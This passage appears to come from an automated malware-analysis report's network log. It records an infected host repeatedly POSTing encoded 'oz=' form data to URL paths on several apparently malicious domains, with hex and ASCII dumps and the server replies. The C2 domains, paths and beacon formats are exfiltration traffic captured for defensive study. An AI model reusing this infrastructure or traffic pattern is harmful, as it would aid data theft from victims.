                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
                                                                                                                                              Oct 4, 2024 08:12:28.589133978 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:28 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              83192.168.11.204981338.47.207.14680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:31.122299910 CEST818OUTPOST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
                                                                                                                                              Oct 4, 2024 08:12:31.423966885 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:31 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              84192.168.11.204981438.47.207.14680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:33.952368975 CEST1289OUTPOST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 52 45 34 39 39 32 39 4b 56 78 43 75 74 7a 62 64 36 77 6a 55 53 38 43 42 7a 70 34 42 36 7a 6c 74 74 64 51 77 77 2b 48 6e 55 39 41 35 67 37 76 48 59 71 66 72 78 46 41 78 53 4d 72 44 5a 51 6f 79 56 5a 47 4f 77 69 57 71 4b 4d 78 2f 5a 46 31 63 35 75 62 76 52 36 44 56 73 49 6f 44 56 70 56 75 73 78 63 4f 56 6e 4f 74 34 54 36 50 5a 78 73 50 4e 61 67 72 50 51 63 52 44 52 76 39 7a 73 6a 70 61 46 43 6e 47 78 55 6c 65 53 43 47 52 36 68 56 56 6d 46 6a 50 64 45 4e 69 4b 50 65 64 79 7a 6f 46 4c 52 7a 52 38 63 4f 35 78 32 42 75 75 69 55 33 6c 49 37 45 46 4c 31 74 57 53 39 63 32 78 64 73 30 49 79 71 76 68 6a 31 48 6b 79 52 2f 6a 6c 69 75 56 76 51 30 33 77 77 48 6c 76 57 38 71 6f 35 30 48 53 39 6c 61 68 5a 68 38 56 61 33 59 38 75 79 74 59 59 49 30 6c 56 49 4c 56 46 72 50 34 48 2b 2f 4c 76 47 77 39 69 37 4c 4e 30 65 43 32 71 43 76 55 77 6c 36 43 48 32 35 52 39 4f 57 6a 48 43 4f 34 58 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzRE49929KVxCutzbd6wjUS8CBzp4B6zlttdQww+HnU9A5g7vHYqfrxFAxSMrDZQoyVZGOwiWqKMx/ZF1c5ubvR6DVsIoDVpVusxcOVnOt4T6PZxsPNagrPQcRDRv9zsjpaFCnGxUleSCGR6hVVmFjPdENiKPedyzoFLRzR8cO5x2BuuiU3lI7EFL1tWS9c2xds0Iyqvhj1HkyR/jliuVvQ03wwHlvW8qo50HS9lahZh8Va3Y8uytYYI0lVILVFrP4H+/LvGw9i7LN0eC2qCvUwl6CH25R9OWjHCO4XkJLM8ZRB0VY8YspLIqcTnw+1OEROyGubT0MQZW8v2/QNZnxm0ZJZt+CBdwl82pfNFtbD2qt4hNgNgbDpb/N3FDrGfupmkanNH6ZjyX46NhZu7zvZfm0fbwc2ckrsDV09OBGOk6Qh17Mwi4rLWYB9g1QNULoVfg6kaBMM5xdBjv2XPZOpmE1i0cv0higHSS9AeS3fUYfPCQDFpRxWigflZ0ZbQnuQ+BuKpimW/0xtVSzclHj0KB58NmkgmWkeE0R0VNSp8jqIS9EYvfTzR4QWIY7mLiQSnI4k0WuqtzBB83KqKUTPttvnj+b7BAPAcjA4E3aEd1+a625Up5Q+ozlwJi8xd1cSD+P
                                                                                                                                              Oct 4, 2024 08:12:33.952416897 CEST1289OUTData Raw: 54 66 71 42 67 36 57 71 39 6b 4b 66 66 4f 36 57 35 6d 58 66 69 66 2b 4d 51 46 52 51 53 4f 6c 41 56 6f 4b 70 68 51 68 54 49 72 5a 37 73 43 4f 41 48 48 4f 6b 44 77 4f 68 39 33 2f 49 4d 61 62 44 4a 51 51 58 2b 51 36 6f 43 4f 71 73 6c 47 38 6b 51 44
                                                                                                                                              Data Ascii: TfqBg6Wq9kKffO6W5mXfif+MQFRQSOlAVoKphQhTIrZ7sCOAHHOkDwOh93/IMabDJQQX+Q6oCOqslG8kQDhWgy0pcOPjrv0yjQUiwXALS4TxA+NXKfo0iXNeX+jwcfeqTbJCmx3Q5gGynVKKWmDER1mnWlUXYqAujtb0/seXbnjU5Ggvj9aOm2SbpAxDgHhCkstYoJ0k+KVJEe2NJC1/dodBZc/8E+QFCt1j9I6YLCF1o4LzsUx
                                                                                                                                              Oct 4, 2024 08:12:33.952476025 CEST5389OUTData Raw: 4f 74 6a 76 53 55 5a 6c 70 33 76 43 77 56 43 4a 4f 4c 6e 70 79 67 7a 78 41 51 41 6b 64 70 42 2f 6e 53 77 42 6c 59 45 63 35 72 55 54 50 67 4f 51 69 51 2f 78 31 64 6a 79 57 54 79 77 77 79 47 2f 42 79 44 74 68 63 70 46 7a 62 54 57 71 78 6d 4d 59 78
                                                                                                                                              Data Ascii: OtjvSUZlp3vCwVCJOLnpygzxAQAkdpB/nSwBlYEc5rUTPgOQiQ/x1djyWTywwyG/ByDthcpFzbTWqxmMYxYZhBtBkN90P7o9FbiQWNM4DkJSflz1102u4Gy6SDK/OeEzEUeexo7mG2aShr6kPdh71ke6yaC157QcKQowvw2j0FLUg8lI1+WmtqyPfQ63aqzpgNR+mZr6NsCLWCICEVs5f15ZhlG0gQ59DKgPgCR3DrEJwKjX3KX
                                                                                                                                              Oct 4, 2024 08:12:34.256735086 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:34 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              85192.168.11.204981538.47.207.14680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:36.788305998 CEST544OUTGET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:12:37.093775988 CEST302INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:36 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              86192.168.11.20498163.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:42.221555948 CEST813OUTPOST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              87192.168.11.20498173.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:44.861121893 CEST833OUTPOST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              88192.168.11.20498183.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:47.502202988 CEST2578OUTPOST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 64 4c 51 50 4e 52 63 6b 58 62 36 43 72 62 49 45 6a 71 6a 42 79 70 48 36 53 66 2f 70 4b 63 46 55 45 4a 52 31 51 43 64 66 58 75 6b 59 30 61 7a 49 53 50 64 52 76 6f 6b 7a 32 7a 78 4a 39 5a 79 4e 6b 79 31 69 4d 46 75 31 57 51 63 37 31 6f 63 33 66 74 6e 66 79 4e 4b 75 50 4b 37 6b 49 62 33 77 69 66 49 77 35 57 6b 69 4a 75 54 4b 58 64 49 65 38 71 63 68 77 47 79 34 41 64 45 50 77 58 54 43 71 54 63 33 37 6b 5a 46 4f 49 74 55 46 76 79 32 59 34 4d 7a 44 65 50 76 56 30 32 70 54 4c 6b 36 2f 43 59 36 2b 4d 37 42 53 44 46 43 70 61 4c 79 33 7a 4f 79 55 73 47 4f 4e 42 68 4c 62 6d 4c 33 31 4b 31 51 42 38 4f 72 6e 4c 53 42 2b 48 42 38 52 6e 46 46 61 61 73 54 72 66 50 38 66 32 4d 4c 4d 57 7a 45 79 4f 79 66 76 63 66 5a 2f 46 6a 59 4e 4e 67 66 72 6e 74 4f 5a 43 72 69 62 4d 42 62 71 31 50 4d 34 37 42 34 47 6d 65 51 70 30 5a 47 4c 33 6f 79 35 79 61 58 4e 31 6b 58 70 6b 45 41 31 4f 4f 6c 6d [TRUNCATED]
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5dLQPNRckXb6CrbIEjqjBypH6Sf/pKcFUEJR1QCdfXukY0azISPdRvokz2zxJ9ZyNky1iMFu1WQc71oc3ftnfyNKuPK7kIb3wifIw5WkiJuTKXdIe8qchwGy4AdEPwXTCqTc37kZFOItUFvy2Y4MzDePvV02pTLk6/CY6+M7BSDFCpaLy3zOyUsGONBhLbmL31K1QB8OrnLSB+HB8RnFFaasTrfP8f2MLMWzEyOyfvcfZ/FjYNNgfrntOZCribMBbq1PM47B4GmeQp0ZGL3oy5yaXN1kXpkEA1OOlmitVwWHvmaJAVRZvnSNOxBHDHsxnlEO257vRGubM7GjRZ42HwWn2pt64zlx64P5v7flDAk09YOWsXJwP6sdmsy31E3bm7e1R/n7GRHrPQr//xJf7d1zTmDxm5h/sPyXq5K0Omns47EixUnJKX3JAemqUfISWOGhXgJ5TtAqv8jbRyUKzHRhUdN8HRZT2Vc1u5ki//mtisMTv7fUU5ouwUOniIy9pxsksV2rQQ2UvsZDXErautIEMBPWtCO0UAzQJ5d/YmsqKBbo7T+hoU5J+5DHeIpEiVPLPFZvDL3w7Zazr+wpfTfTIXAoc9c+8syyfLkIXt6AU7yIwmdpt2hyeyejVA3VCkzB8ZPK5RcSREEOvX+aHGLv0Xeqk8N3rBA1IYWy8brq4Yavsmoc7A+4bVFuxF1XKFN3MJLxzvWEmdDXS45sMqgT/sAQYm4x/T5tsMHj29EAHfaz4zWhUWPduz9CoczxTnTKNAPwfYD9jeWfqrDxRt0iD//AfydCgrYmpcMCPUOyt1JhgHE1T66f2el5l22jc36Umcn7DYnq15Cmf4iw3Sfq0PWluZwpqTK6rq43fJIa/ks8y3cmOAdOofzpBTaRz3sjvafhJXgnUf9QnrXEpwnOc1WBzx0ekQUMYkEG490ZA0LkLLQmtMOB/jfb4bpyDD/kUwoc [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:12:47.502250910 CEST5404OUTData Raw: 51 78 6b 54 57 38 55 2b 79 65 59 45 5a 58 36 39 48 69 45 52 45 53 46 57 51 2f 52 2f 79 4f 6a 56 6e 76 55 76 76 37 74 31 7a 69 57 67 32 4b 39 4e 46 61 4a 54 4a 32 33 33 57 44 69 48 6c 34 69 4a 42 4e 46 4d 49 38 70 62 47 78 6f 2b 52 37 64 4b 63 64
                                                                                                                                              Data Ascii: QxkTW8U+yeYEZX69HiERESFWQ/R/yOjVnvUvv7t1ziWg2K9NFaJTJ233WDiHl4iJBNFMI8pbGxo+R7dKcdE9Jn+/0z/MgjDJ2BhkLZdpPGxLrSL+Tnj4xIMM6dLYF3EpIznJotHC+OJo/MlBSzJ6igaxM/7pi2wUNfg7MEjtZtFjI/0SZOcc3jZ8kyjD+GDqDuYqKmxrDASd2qsEGQ1rebqvbJyYbta3BiMj6ZfjxgMjEddXIMj


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              89192.168.11.20498193.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:50.137732983 CEST549OUTGET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:12:50.239214897 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:50 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 55 6f 6f 71 69 55 2b 75 69 58 52 70 68 6c 65 78 78 69 68 59 38 2b 70 52 32 70 31 71 53 61 43 47 52 73 4d 69 67 74 34 4d 47 70 41 2f 56 4b 56 79 58 6b 4c 38 71 79 65 69 66 56 57 49 31 51 66 39 49 62 4b 6a 6a 61 54 2b 4e 42 34 30 45 48 49 31 63 73 4f 77 38 62 45 48 38 72 76 35 58 67 50 70 73 48 69 6c 32 4a 34 77 35 4d 4a 4f 77 67 70 41 74 31 62 43 52 76 30 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              90192.168.11.2049820162.213.249.21680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:55.417207956 CEST813OUTPOST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
